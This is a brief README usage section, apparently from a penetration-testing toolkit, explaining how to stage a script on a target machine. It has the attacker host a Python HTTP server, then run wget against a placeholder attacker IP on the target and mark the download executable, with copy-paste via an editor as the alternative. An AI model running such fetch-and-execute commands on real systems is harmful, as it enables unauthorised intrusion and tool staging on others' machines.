# Usage
## Adhoc upload to target via http server
* on local attacker
```python3 -m http.server 8000```
or 
```python -m SimpleHTTPServer```

* on target
```wget http://<attacker-ip>:8000/<script>```
```chmod +x <script>```

## Copy to editor via clipboard
* vi, nano, heredoc
```chmod +x <script>```
